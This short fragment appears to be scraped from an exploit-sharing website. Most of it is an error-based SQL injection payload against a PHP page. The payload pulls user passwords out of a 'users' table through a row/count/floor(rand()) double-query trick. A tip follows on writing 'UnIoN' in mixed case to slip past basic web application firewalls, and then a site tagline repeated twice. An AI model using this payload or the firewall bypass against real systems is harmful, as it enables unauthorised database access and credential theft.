file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) —.
Instead of union UnIoN In some basic WAF’s this will work.
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.